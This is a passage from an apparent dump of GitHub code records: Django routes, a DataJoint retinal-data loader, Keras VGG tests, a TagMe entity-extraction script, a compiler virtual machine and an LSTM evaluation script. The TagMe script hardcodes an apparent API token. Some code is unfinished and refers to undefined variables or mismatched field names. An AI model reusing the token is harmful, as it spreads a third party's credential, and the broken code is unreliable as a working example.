import views\n\nurlpatterns = [\n url(r'^$', views.index, name = \"index\"),\n url(r'^register$', views.register, name =\"register\"),\n url(r'^dashboard$', views.dashboard, name =\"dashboard\"),\n url(r'^dashboard/admin$', views.admin_dashboard, name =\"admin_dashboard\"),\n url(r'^login$', views.login, name=\"login\"),\n # url(r'^users/new$', views.create_user, name=\"create\"),\n url(r'^users/edit/(?P<id>\\d+)/$', views.admin_edit_user, name=\"admin_edit_user\"),\n url(r'^users/update/(?P<id>\\d+)/$', views.edit_user_info, name=\"edit_user_info\"),\n url(r'^users/delete/(?P<id>\\d+)/$', views.delete_user_info, name=\"delete_user_info\"),\n url(r'^logout$', views.log_out, name=\"log_out\"),\n]","repo_name":"mhn-mnsr/DojoAssignments","sub_path":"Python/Django_projects/user_dashboard/apps/users_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72384924009","text":"import os\nimport inspect\nimport hashlib\nimport h5py\nimport datajoint as dj\nimport numpy as np\n\n\nschema = dj.schema('dklindt_bipolar_data', locals())\n\nPATH = os.path.dirname(os.path.dirname(os.path.dirname(inspect.stack()[0][1])))\nDATA_PATH = os.path.join(PATH, 'data/bipolar')\n\nNUM_CLIPS = 108\nNUM_VAL_CLIPS = 15\nrnd = np.random.RandomState(seed=2364782)\nVAL_CLIP_IDX = set(rnd.choice(NUM_CLIPS, NUM_VAL_CLIPS, replace=False))\nTRAIN_CLIP_IDX = set(range(NUM_CLIPS)) - VAL_CLIP_IDX\n\nclass Dataset:\n def __init__(self,\n movie_train,\n movie_test,\n movie_ordering,\n movie_trigger_times,\n responses,\n response_trigger_times):\n # NOTE: the body below still references images_train/val/test and\n # responses_train/val/test, which are not among the movie_* parameters;\n # this constructor is unfinished (see the TODO in Stimulus.load_data below).\n\n # preprocess images (mean=0, SD=1)\n m = images_train.mean()\n sd = images_train.std()\n zscore = lambda img: (img - m) / sd\n self.images_train = zscore(images_train)[...,None]\n self.images_val = zscore(images_val)[...,None]\n self.images_test = zscore(images_test)[...,None]\n \n # preprocess responses (SD=1)\n sd = responses_train.std(axis=0)\n sd[sd < (sd.mean() / 100)] = 1\n def rectify_and_normalize(x):\n x[x < 0] = 0\n return x / sd\n self.responses_train = rectify_and_normalize(responses_train)\n self.responses_val = rectify_and_normalize(responses_val)\n self.responses_test = rectify_and_normalize(responses_test)\n \n self.num_neurons = responses_train.shape[1]\n self.num_train_samples = images_train.shape[0]\n self.px_x = images_train.shape[2]\n self.px_y = images_train.shape[1]\n self.input_shape = [None, self.px_y, self.px_x, 1]\n self.next_epoch()\n\n def val(self):\n return self.images_val, self.responses_val\n\n def train(self):\n return self.images_train, self.responses_train\n\n def test(self, averages=True):\n responses = self.responses_test.mean(axis=0) if averages else self.responses_test\n return self.images_test, responses\n\n def minibatch(self, batch_size):\n if self.minibatch_idx + batch_size > self.num_train_samples:\n self.next_epoch()\n idx = self.train_perm[self.minibatch_idx + np.arange(0, batch_size)]\n self.minibatch_idx += batch_size\n return self.images_train[idx, :, :], self.responses_train[idx, :]\n\n def next_epoch(self):\n self.minibatch_idx = 0\n self.train_perm = np.random.permutation(self.num_train_samples)\n\n\n@schema\nclass Scan(dj.Lookup):\n definition = \"\"\" # Bipolar cells with iGluSnfr\n animal_id : int # animal id\n retina : ENUM(\"L\", \"R\") # retina side\n scan_idx : tinyint # scan index\n ---\n folder : varchar(255) # folder name\n \"\"\"\n\n contents = [\n [1, 'R', 2, 'pilot1'],\n [1, 'R', 3, 'pilot1'],\n [1, 'R', 
4, 'pilot1'],\n [2, 'L', 0, 'pilot2/LeftRetina/IPL0'],\n [2, 'R', 0, 'pilot2/rightretina/IPL0'],\n [2, 'R', 1, 'pilot2/rightretina/IPL1'],\n [2, 'R', 2, 'pilot2/rightretina/IPL2'],\n [2, 'R', 3, 'pilot2/rightretina/IPL3'],\n [2, 'R', 4, 'pilot2/rightretina/IPL4'],\n ]\n\n\n@schema\nclass StimulusLookup(dj.Lookup):\n definition = \"\"\" # Stimulus types\n stimulus_id : tinyint unsigned # stimulus id\n ---\n stimulus_name : varchar(255) # name of stimulus\n \"\"\"\n\n contents = [\n [1, 'step'],\n [2, 'local chirp'],\n [3, 'global chirp'],\n [4, 'natural movies raw'],\n [5, 'natural movies equalized'],\n [6, 'dense noise'],\n ]\n\n\n@schema\nclass NaturalMovies(dj.Lookup):\n definition = \"\"\"\n -> StimulusLookup\n ---\n train_movie_file : varchar(255) # file containing movie frames\n test_movie_file : varchar(255) # file containing movie frames\n \"\"\"\n\n contents = [\n [4, 'movies_train.tiff', 'movies_test.tiff'],\n [5, 'train.tiff', 'test.tiff'],\n ]\n\n\n@schema\nclass MovieSplits(dj.Lookup):\n definition = \"\"\"\n clip_idx : int unsigned # clip index\n ---\n split : ENUM(\"train\", \"val\") # train or validation set?\n \"\"\"\n \n @property\n def contents(self):\n contents = []\n for clip_idx in range(NUM_CLIPS):\n contents += [[float(clip_idx),\n 'val' if clip_idx in VAL_CLIP_IDX else 'train']]\n return contents\n \n\n@schema\nclass Stimulus(dj.Lookup):\n definition = \"\"\" # Stimuli shown\n -> Scan\n -> StimulusLookup\n ---\n data_file : varchar(255) # name of data file\n \"\"\"\n \n @property\n def contents(self):\n contents = [\n [1, 'R', 2, 4, 'SMP_M1_RR_IPL2_NM.h5'],\n [1, 'R', 2, 6, 'SMP_M1_RR_IPL2_DN.h5'],\n [1, 'R', 3, 4, 'SMP_M1_RR_IPL3_NM.h5'],\n [1, 'R', 3, 6, 'SMP_M1_RR_IPL3_DN.h5'],\n [1, 'R', 4, 4, 'SMP_M1_RR_IPL4_NM.h5'],\n [1, 'R', 4, 6, 'SMP_M1_RR_IPL4_DN.h5'],\n [2, 'L', 0, 1, 'SMP_M1_LR_IPL0_1s.h5'],\n [2, 'L', 0, 2, 'SMP_M1_LR_IPL0_lChirp.h5'],\n [2, 'L', 0, 3, 'SMP_M1_LR_IPL0_Chirp.h5'],\n [2, 'L', 0, 5, 'SMP_M1_LR_IPL0_NM.h5'],\n [2, 'L', 0, 6, 'SMP_M1_LR_IPL0_DN.h5'],\n ]\n for i in range(5):\n contents += [\n [2, 'R', i, 1, 'SMP_M1_RR_IPL{}_1s.h5'.format(i)],\n [2, 'R', i, 2, 'SMP_M1_RR_IPL{}_lChirp.h5'.format(i)],\n [2, 'R', i, 3, 'SMP_M1_RR_IPL{}_Chirp.h5'.format(i)],\n [2, 'R', i, 5, 'SMP_M1_RR_IPL{}_NM.h5'.format(i)],\n [2, 'R', i, 6, 'SMP_M1_RR_IPL{}_DN.h5'.format(i)],\n ] \n return contents\n\n def num_rois(self):\n file_name = os.path.join(DATA_PATH, self.fetch1('data_file'))\n file = h5py.File(file_name, 'r')\n return len(list(file['Traces0_raw'])[0])\n \n def load_data(self):\n file_name = self.fetch1('data_file')\n # TODO: load files\n return Dataset(movie_train,\n movie_test,\n movie_ordering,\n movie_trigger_times,\n responses,\n response_trigger_times)\n\n\n@schema\nclass MultiDataset(dj.Lookup):\n definition = \"\"\" # Dataset consisting of multiple scans\n data_hash : char(32) # unique identifier for dataset\n ---\n restriction : varchar(255) # description\n \"\"\"\n \n _order_members_by = 'animal_id ASC, retina ASC, scan_idx ASC'\n \n class Member(dj.Part):\n definition = \"\"\" # Scans and stimuli that are part of this dataset\n -> master\n member_id : tinyint unsigned # member id\n ---\n -> Stimulus\n \"\"\"\n\n class Roi(dj.Part):\n definition = \"\"\" # Scans that are part of this dataset\n -> master\n roi_id : int unsigned # ROI id\n ---\n -> master.Member\n \"\"\"\n\n def fill(self):\n restrictions = [\n 'animal_id=1 and stimulus_id=4',\n 'animal_id=2 and stimulus_id=5',\n ]\n for i, r in enumerate(restrictions):\n data_hash = 
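# Self-contained sketch of the deterministic clip split defined at the top of
# this file: seeding RandomState makes the train/validation partition
# reproducible across runs (numpy only; constants copied from above).
import numpy as np

NUM_CLIPS, NUM_VAL_CLIPS = 108, 15
rnd = np.random.RandomState(seed=2364782)
val_idx = set(rnd.choice(NUM_CLIPS, NUM_VAL_CLIPS, replace=False))
train_idx = set(range(NUM_CLIPS)) - val_idx
assert not (val_idx & train_idx) and len(val_idx | train_idx) == NUM_CLIPS
print(sorted(val_idx)[:5])  # identical on every run thanks to the fixed seed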
hashlib.md5(str(i).encode()).hexdigest()\n key = dict(data_hash=data_hash, restriction=r)\n if not len(self & key):\n self.insert1(key)\n n = 0\n for j, tupl in enumerate(\n (self * Stimulus() & key & r).fetch(\n dj.key, order_by=self._order_members_by)):\n tupl['member_id'] = j\n self.Member().insert1(tupl)\n num_rois = (Stimulus() & tupl).num_rois()\n rois = [{'data_hash': data_hash, 'member_id': j, 'unit_id': n+k} for k in range(num_rois)]\n n += num_rois\n self.Roi().insert(rois)\n\n\n def load_data(self):\n assert len(self) == 1, 'Relation must be scalar.'\n data = []\n for key in (self * self.Member).fetch(dj.key):\n data.append((Stimulus() & key).load_data())\n return data\n","repo_name":"aecker/cnn-sys-ident","sub_path":"cnn_sys_ident/bipolar/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8238,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"74167206247","text":"\"\"\"\nkeras 自带 vgg 模型\n\"\"\"\nfrom tensorflow.keras.applications import vgg16, vgg19\nfrom tensorflow import keras\n\n\n\ndef test_0():\n \"\"\"\n 使用 keras 自带的 VGG 模型\n\n include_top:是否要最后的 3 层全连接层\n weights: Node 随机初始化,'imagenet' 下载从 ImageNet 训练的权重\n \"\"\"\n vgg_16 = vgg16.VGG16(input_shape=(224, 224, 3),\n weights=None,\n include_top=False,\n backend=keras.backend,\n layers=keras.layers,\n models=keras.models,\n utils=keras.utils)\n vgg_16.summary()\n\ndef test_1():\n \"\"\"\n VGG19\n \"\"\"\n vgg_19 = vgg19.VGG19(input_shape=(224, 224, 3),\n weights=None,\n include_top=False,\n backend=keras.backend,\n layers=keras.layers,\n models=keras.models,\n utils=keras.utils)\n print(type(vgg_19))\n print(vgg_19.summary())\n\n\nif __name__ == '__main__':\n test_0()","repo_name":"jelly-lemon/deep_learning_study","sub_path":"VGG_study/vgg_study.py","file_name":"vgg_study.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86356987940","text":"# -*- coding:utf-8 -*-\r\n'''\r\nCreate time: 2020/4/10 13:55\r\n@Author: 大丫头\r\n'''\r\nimport csv\r\nimport tagme\r\nimport requests\r\nimport pickle\r\n\r\nimport warnings\r\nwarnings.filterwarnings('ignore')\r\n\r\nprint(requests.__version__)\r\n\r\nrequests.adapters.DEFAULT_RETRIES = 2 # 增加重连次数\r\ntagme.GCUBE_TOKEN=\"9e16d353-0c47-4fef-8ccc-676a8591f478-843339462\"\r\n\r\nproxies = {\r\n \"https\": \"127.0.0.1:8001\"\r\n}\r\n\r\n# 从电子病历中提取实体\r\ndef extract_entity(filename,label_desc):\r\n '''\r\n :param filename:电子病历文件\r\n :param label_desc:ICD以及对应的描述(dict)\r\n :return:\r\n label_entity.pkl 文件:每个label对应的实体list(dict)\r\n EHR-label-entity-kg.csv文件:相比filename增加了EHR对应的实体这一列\r\n '''\r\n # 结果写入文件\r\n writer_f=open('data/EHR-label-entity-kg.csv','w',newline='')\r\n writer=csv.writer(writer_f)\r\n label_entity_EHR_related={}\r\n #打开文件\r\n with open(filename,'r') as f:\r\n reader=csv.reader(f)\r\n data=[row for row in reader][1:]\r\n for row in data:\r\n # 原数据:SUBJECT_ID,HADM_ID,TEXT,LABELS\r\n print('row:',row)\r\n count=0\r\n # 利用tagme提取其中的实体\r\n #row='group of metabolic disorders characterized by high blood sugar levels over a prolonged period'\r\n try:\r\n tomatoes_mentions = tagme.mentions(row[2])\r\n mentions=tomatoes_mentions.mentions\r\n # 将数据写入文件中\r\n content=[row[0],row[1],row[2],0,row[3]]\r\n content[3]=';'.join([mention.__str__().strip().split('[')[0][:-1] for mention in mentions])\r\n if len(content)>0:\r\n writer.writerow(content)\r\n count+=1\r\n except:\r\n pass\r\n labels=row[3].split(';')\r\n 
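# Sketch of the md5-based keying used in MultiDataset.fill above: hashing a
# short string yields a stable 32-character hex digest suitable as a primary
# key (stdlib only).
import hashlib

for i in range(2):
    data_hash = hashlib.md5(str(i).encode()).hexdigest()
    print(i, data_hash, len(data_hash))  # deterministic, always 32 hex chars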
for label in labels:\r\n if label in label_desc:\r\n desc = label_desc.get(label)\r\n try:\r\n tomatoes_mentions = tagme.mentions(desc)\r\n mentions = tomatoes_mentions.mentions\r\n if label not in label_entity_EHR_related:\r\n label_entity_EHR_related[label]=[mention.__str__().strip().split('[')[0][:-1] for mention in mentions]\r\n except:\r\n label_entity_EHR_related[label] = []\r\n else:\r\n label_entity_EHR_related[label] = []\r\n print(label_entity_EHR_related.get(label))\r\n\r\n writer_f.close()\r\n # 将label_entity_EHR_related保存下来 以备后面的使用\r\n with open('data/label_entity.pkl','wb') as f:\r\n pickle.dump(label_entity_EHR_related,f)\r\n\r\n\r\ndef get_label_desc(ICD_desc_file):\r\n '''\r\n :param ICD_desc_file: ICD的描述文件即ICD9_descriptions.txt\r\n :return:label_desc:每个ICD对应的描述(dict)\r\n '''\r\n label_desc={}\r\n # 打开label描述文件\r\n with open(ICD_desc_file,'r') as f:\r\n lines=f.readlines()\r\n for line in lines:\r\n print(repr(line))\r\n label,desc=line[:-1].split('\\t')\r\n if label not in label_desc:\r\n label_desc[label]=desc\r\n return label_desc\r\n\r\nif __name__ == '__main__':\r\n # step1: extract entity\r\n label_desc=get_label_desc('data/ICD9_descriptions.txt')\r\n extract_entity('data/note_labeled_test.csv',label_desc)\r\n\r\n","repo_name":"WOW5678/CoGraph","sub_path":"simple_wikidata_process_EHR.py","file_name":"simple_wikidata_process_EHR.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"14252046406","text":"# ****************\n# SUMA HETEROGÉNEA\n# ****************\n\n\ndef run(items: list) -> int:\n to_dec = [int(i) for i in items]\n sum_items = sum(to_dec)\n\n return sum_items\n\n\nif __name__ == '__main__':\n run([1, '2', 3, '4', 5])","repo_name":"RobertGiantSteps/PRO","sub_path":"LISTAS/sum_mixed.py","file_name":"sum_mixed.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74171142569","text":"\"\"\"\n Proyecto Final\n Autor: Óscar Antonio Hinojosa Salum A00821930\n Mayo 28 2023\n Compilador para lenguaje al estilo R/C++.\n\n --- VM / Virtual Machine / Máquina Virtual ---\n\"\"\"\n\n# ======================== Virtual Machine ======================== #\n\nimport pprint\nimport copy\nimport re\n\nclass VirtualMachine:\n def __init__(self):\n self.memorySize = 500 # ! CRITICAL ! \"IndexError: list assignment index out of range\"\n self.registers = [None] * self.memorySize\n self.registers[0] = \"GOTO MAIN\"\n self.functionJumps = []\n self.program_counter = 0\n self.quadruples = []\n self.symbolTable = []\n # For recursion, oh boy\n self.recursiveIteration = 0\n self.recursiveRegisters = []\n self.recursiveTable = []\n self.returns = []\n\n\n def start(self, quadruples, newSymbolTable):\n self.quadruples = quadruples\n self.symbolTable = newSymbolTable\n self.run()\n\n\n def run(self):\n \"\"\"\n !run\n * Cuádruplos en forma de tuplas tipo:\n * [operador, operandoIzquierdo, operandoDerecho, dondeInsertarResultado]\n ? 
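# The script above persists its label -> entity map with pickle; a minimal
# roundtrip sketch (stdlib only; writes a throwaway file in the working
# directory).
import pickle

label_entity = {"250.00": ["Diabetes", "Blood sugar"]}
with open("label_entity_demo.pkl", "wb") as f:
    pickle.dump(label_entity, f)
with open("label_entity_demo.pkl", "rb") as f:
    restored = pickle.load(f)
assert restored == label_entity  # bytes round-trip to an identical dict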
Resultados del programa\n \"\"\"\n \n while self.program_counter < len(self.quadruples):\n operator, operand1, operand2, target = copy.deepcopy(self.quadruples[self.program_counter])\n\n # Qué asco ya sé, una búsqueda lineal O(n) por cada operando que sea una variable...\n # Si nuestro resultado será un espacio temporal, lo \"hacemos\" índice (t1 = 1, t82 = 82, ...)\n # \"t0\", al \"no existir\", lo dejé reservado para el GOTO MAIN por si acaso y mientras\n isTargetTemp = False # Exclusivo para los returns\n if isinstance(target, str) and re.match(r\"^t\\d+$\", target) :\n isTargetTemp = True\n target = int(target[1:])\n # self.registers.append(target) # ? Could this turn registers into a dynamic memory/vector? Adaptable size\n \n isOperand1Str = isinstance(operand1, str)\n isOperand2Str = isinstance(operand2, str)\n\n # Si nuestro operando izquierdo es un espacio temporal ...\n if isOperand1Str and re.match(r\"^t\\d+$\", operand1) and operator != 'GOSUB' : \n if len(self.recursiveRegisters) > 0 : operand1 = self.recursiveRegisters[-1][int(operand1[1:])]\n else : operand1 = self.registers[int(operand1[1:])]\n # Si no, debe ser un ID cuyo valor debemos sacar de la SymbolTable\n elif isOperand1Str :\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for tuple in table :\n if operand1 == tuple[1] :\n foundRecursiveVar = True\n # Si es una lista de un solo elemento, sacarlo\n if isinstance(tuple[6], list) and len(tuple[6]) == 1 : operand1 = tuple[6][0]\n # Si sufrió alguna actualización antes de aquí, lo más seguro es\n # que ya no es una lista de un elemento, sino número o string ...\n else : operand1 = tuple[6]\n break\n if not foundRecursiveVar:\n for tuple in self.symbolTable :\n if operand1 == tuple[1] :\n # Si es una lista de un solo elemento, sacarlo\n if isinstance(tuple[6], list) and len(tuple[6]) == 1 : operand1 = tuple[6][0]\n # Si sufrió alguna actualización antes de aquí, lo más seguro es\n # que ya no es una lista de un elemento, sino número o string ...\n else : operand1 = tuple[6]\n break\n\n # Para lidiar con condicionales, el problema de bool() es que si es una string\n # con valor de 'False' la convierte a un booleano True porque lo que checa es que\n # la string está vacía o no. 
El que nos interesa es eval(), pero solo funciona con\n # strings; no importa si usamos bool() para valores numéricos\n if operand1 == 'True' or operand1 == \"False\" :\n operand1 = eval(operand1)\n\n # Si nuestro operando derecho es un espacio temporal ...\n if isOperand2Str and re.match(r\"^t\\d+$\", operand2) and operator != 'GOSUB' : \n if len(self.recursiveRegisters) > 0 : operand2 = self.recursiveRegisters[-1][int(operand2[1:])]\n else : operand2 = self.registers[int(operand2[1:])]\n # Si no, debe ser un ID cuyo valor debemos sacar de la SymbolTable\n elif isOperand2Str:\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for tuple in table :\n if operand2 == tuple[1] :\n foundRecursiveVar = True\n # Si es una lista de un elemento, sacarlo\n if isinstance(tuple[6], list) : operand2 = tuple[6][0]\n else : operand2 = tuple[6]\n break\n if not foundRecursiveVar:\n for tuple in self.symbolTable :\n if operand2 == tuple[1] :\n # Si es una lista de un elemento, sacarlo\n if isinstance(tuple[6], list) : operand2 = tuple[6][0]\n else : operand2 = tuple[6]\n break\n\n if operand2 == 'True' or operand2 == \"False\" :\n operand2 = eval(operand2)\n\n if operand1 == None : operand1 = 1\n if operand2 == None : operand2 = 1\n \n \n\n # ======= REGISTERS ========\n if operator == '+':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 + operand2\n else : self.registers[target] = operand1 + operand2\n elif operator == '-':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 - operand2\n else : self.registers[target] = operand1 - operand2\n elif operator == '*':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 * operand2\n else : self.registers[target] = operand1 * operand2\n elif operator == '**':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 ** operand2\n else : self.registers[target] = operand1 ** operand2\n elif operator == '/':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1 / operand2\n else : self.registers[target] = operand1 / operand2\n elif operator == '>':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 > operand2)\n else : self.registers[target] = int(operand1 > operand2)\n elif operator == '<':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 < operand2)\n else : self.registers[target] = int(operand1 < operand2)\n elif operator == '<=':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 <= operand2)\n else : self.registers[target] = int(operand1 <= operand2)\n elif operator == '>=':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = int(operand1 >= operand2)\n else : self.registers[target] = int(operand1 >= operand2)\n elif operator == '==':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) == bool(operand2)\n else : self.registers[target] = bool(operand1) == bool(operand2)\n elif operator == '!=' or operator == '<>':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) != bool(operand2)\n else : self.registers[target] = bool(operand1) != bool(operand2)\n elif operator == '&&':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) and bool(operand2)\n else : self.registers[target] = 
bool(operand1) and bool(operand2)\n elif operator == '||':\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = bool(operand1) or bool(operand2)\n else : self.registers[target] = bool(operand1) or bool(operand2)\n elif operator == '=' or operator == '<-':\n # Si es un string, es porque a fuerza es un ID ...\n if target.__class__.__name__ == 'str' :\n # En caso de estar en una función cualquiera, verificar la variable en su memoria exclusiva/recursiva\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = copy.deepcopy(self.recursiveTable.pop()) # [-1], Pop y append no funcionaron, esta libreria fue obligatoria\n for i, tuple_item in enumerate(table):\n if target == tuple_item[1]:\n foundRecursiveVar = True\n currentRow = table[i]\n # Actualizamos la columna \"value\"\n index_to_change = 6\n currentRow = currentRow[:index_to_change] + (operand1,)\n table[i] = currentRow\n # En caso de haberse transformado de INT a FLOAT, actualizar TYPE\n if currentRow[0] != operand1.__class__.__name__ :\n currentRow = (operand1.__class__.__name__,) + currentRow[1:]\n table[i] = currentRow\n self.recursiveTable.append(table) # Esto fue lo que resolvió la recursión compleja, me llevó días\n # Si no se encontró alguna varible en la tabla recursiva, es porque es global o ni siquiera estamos en una función\n if not foundRecursiveVar:\n for i, tuple_item in enumerate(self.symbolTable):\n if target == tuple_item[1]:\n currentRow = self.symbolTable[i]\n # Actualizamos la columna \"value\"\n index_to_change = 6\n currentRow = currentRow[:index_to_change] + (operand1,)\n self.symbolTable[i] = currentRow\n # En caso de haberse transformado de INT a FLOAT, actualizar TYPE\n if currentRow[0] != operand1.__class__.__name__ :\n currentRow = (operand1.__class__.__name__,) + currentRow[1:]\n self.symbolTable[i] = currentRow\n # Si no, es el index de un espacio temporal\n else:\n if len(self.recursiveRegisters) > 0 : self.recursiveRegisters[-1][target] = operand1\n else : self.registers[target] = operand1\n elif operator.lower() == 'goto':\n self.program_counter = target\n continue\n elif operator.lower() == 'gotof':\n if operand1 == 'False' or operand1 == 0 : self.program_counter = target\n else : self.program_counter += 1\n continue\n elif operator.lower() == 'gotov':\n # Aquí se me ocurrió cambiar el chequeo de booleanos igual a Python o C++ :\n # if num != 0 = TRUE, else FALSE no matter what\n if operand1 == 'True' or operand1 != 0 : self.program_counter = target\n else : self.program_counter += 1\n continue\n elif operator.lower() == 'print':\n if isinstance(operand1, list):\n for index, element in enumerate(operand1) :\n if isinstance(element, str) and re.match(r\"^t\\d+$\", element) : \n if len(self.recursiveRegisters) > 0 : operand1[index] = str(self.recursiveRegisters[-1][int(element[1:])])\n else : operand1[index] = str(self.registers[int(element[1:])])\n elif isinstance(element, str) and '\"' not in element and \"'\" not in element :\n # En caso de estar en una función cualquiera, verificar la variable en su memoria exclusiva/recursiva\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for i, tuple_item in enumerate(table):\n if element == tuple_item[1]:\n foundRecursiveVar = True\n operand1[index] = str(tuple_item[6])\n # Si no se encontró alguna variable en la tabla recursiva, es porque es global o ni siquiera estamos en una función\n if not foundRecursiveVar:\n for i, tuple_item in enumerate(self.symbolTable):\n if element 
== tuple_item[1]:\n operand1[index] = str(tuple_item[6])\n elif '\"' in element :\n operand1[index] = element.strip('\"')\n elif \"'\" in element :\n operand1[index] = element.strip(\"'\")\n \n operand1 = \" \".join(reversed(operand1))\n print(operand1.strip('\"')) if operand1.__class__.__name__ == 'str' else print(operand1)\n elif operator.lower() == 'gosub':\n self.program_counter = target\n self.functionJumps.append(operand2)\n self.returns.append(operand1)\n continue\n elif operator.lower() == 'endfunc' or operator.lower() == 'return':\n if operator.lower() == 'return' :\n temporal = int(self.returns.pop()[1:])\n if target.__class__.__name__ == 'str' or target.__class__.__name__ == 'char' :\n # En caso de estar en una función cualquiera, verificar la variable en su memoria exclusiva/recursiva\n foundRecursiveVar = False\n if self.recursiveIteration > 0:\n table = self.recursiveTable[-1]\n for i, tuple_item in enumerate(table):\n if target == tuple_item[1]:\n foundRecursiveVar = True\n if len(self.recursiveRegisters) > 1 : self.recursiveRegisters[-2][temporal] = tuple_item[6]\n else : self.registers[temporal] = tuple_item[6]\n # Si no se encontró alguna variable en la tabla recursiva, es porque es global o ni siquiera estamos en una función\n if not foundRecursiveVar:\n for i, tuple_item in enumerate(self.symbolTable):\n if target == tuple_item[1]:\n self.registers[temporal] = tuple_item[6]\n elif isTargetTemp:\n if len(self.recursiveRegisters) > 1 : self.recursiveRegisters[-2][temporal] = self.recursiveRegisters[-1][target]\n else : self.registers[temporal] = self.recursiveRegisters[-1][target]\n else:\n if len(self.recursiveRegisters) > 1 : self.recursiveRegisters[-2][temporal] = target\n else : self.registers[temporal] = target\n \n self.recursiveIteration -= 1\n self.recursiveTable.pop()\n self.recursiveRegisters.pop()\n if self.functionJumps : \n self.program_counter = self.functionJumps.pop()\n continue\n elif operator.lower() == 'endprog':\n if operand1:\n print(\"v v v v v v === DEBUGGING === v v v v v v\")\n print(\"-------------- === Final Quadruples === --------------\")\n for i, item in enumerate(self.quadruples):\n print(f\"{i}: {item}\")\n print(\"-------------- === Final Symbol Table (Updated Values) === --------------\")\n pprint.pprint(self.symbolTable)\n #print('Registers:', self.registers) # It's so big\n #print('Recursive Registers:', self.recursiveRegisters) # Should always be empty\n print('Compilation Completed')\n elif operator.lower() == 'era':\n self.recursiveIteration += 1\n if self.recursiveIteration > 1 and self.recursiveTable :\n self.recursiveTable.append(self.recursiveTable[-1].copy())\n self.recursiveRegisters.append(self.registers.copy()) # Encontrar estos .copy() me hizo demasiado daño\n else :\n self.recursiveTable.append([entry for entry in self.symbolTable if entry[5] == target].copy())\n self.recursiveRegisters.append(self.registers.copy())\n\n self.program_counter += 1","repo_name":"Caferino/Compilador-CR","sub_path":"VirtualMachine.py","file_name":"VirtualMachine.py","file_ext":"py","file_size_in_byte":18131,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12463268971","text":"import torch\nimport pickle\nimport sys\n\nfrom torch.utils import data\nsys.path.append('./data/')\nfrom multi_hot_encoding import get_dataset_multi_hot\nfrom models.lstm_melody_models import LSTM_Multihot\nfrom helpers import evaluate_model\n\n\nmodel_path = 'models/trained_models/1_Baseline.pth'\ndataset = 
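# A compact, self-contained sketch of the quadruple-interpreter pattern the
# VirtualMachine class above implements: each quadruple is
# (operator, left_operand, right_operand, target), and a program counter
# walks the list. The mini-program here is hypothetical, not taken from the
# compiler's test suite.
def run_quads(quads):
    regs, pc = {}, 0
    while pc < len(quads):
        op, a, b, target = quads[pc]
        val = lambda x: regs.get(x, x)  # temporaries resolve, literals pass through
        if op == "+":
            regs[target] = val(a) + val(b)
        elif op == "=":
            regs[target] = val(a)
        elif op == "GOTO":
            pc = target
            continue  # jump without the usual pc increment
        pc += 1
    return regs

print(run_quads([("+", 2, 3, "t1"), ("=", "t1", None, "x")]))  # {'t1': 5, 'x': 5}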
1\n\nmodel_path_mel = 'models/trained_models/2_Melody.pth'\ndataset_mel = 2\n\nmodel_path_mel_w = 'models/trained_models/6_Melody_weighted.pth'\ndataset_mel_w = 6\n\nmodel_path_mel_dur = 'models/trained_models/5_Melody_Duration.pth'\ndataset_mel_dur = 5\n\nmodel_path_bass = 'models/trained_models/3_Bass.pth'\ndataset_bass = 3\n\nmodel_path_mel_bass = 'models/trained_models/4_Melody_Bass.pth'\ndataset_mel_bass = 4\n\nuse_saved_set=True\n\n\nhidden_dim = 192\nlayers = 2\nseed = 42\n\ndef compute_test_acc(model_path, dataset, use_saved_set=True):\n device = torch.device(\"cpu\")\n \n if use_saved_set:\n with open('data/datasets/dataset%d.pickle' % dataset, 'rb') as f:\n (train_dataset, val_dataset, test_dataset, input_size, target_size) = pickle.load(f)\n print('*** Dataset loaded from file ***')\n else:\n train_dataset, val_dataset, test_dataset, input_size, target_size = get_dataset_multi_hot(choice=dataset, seed=seed)\n \n # Load model\n model = LSTM_Multihot(input_size, embed_size=hidden_dim, lstm_hidden_size=hidden_dim, target_size=target_size, num_layers=layers)\n model.load_state_dict(torch.load(model_path))\n\n # evaluate\n tr_acc = evaluate_model(model, device, dataset=train_dataset)\n print('Train accuracy:\\t%.2f %%' % tr_acc)\n val_acc = evaluate_model(model, device, dataset=val_dataset)\n print('Val accuracy:\\t%.2f %%' % val_acc)\n te_acc = evaluate_model(model, device, dataset=test_dataset)\n print('Test accuracy:\\t%.2f %%' % te_acc)\n return te_acc\n \nprint('\\nLoading Baseline:')\nacc_baseline = compute_test_acc(model_path, dataset, use_saved_set=use_saved_set)\n#print('Baseline 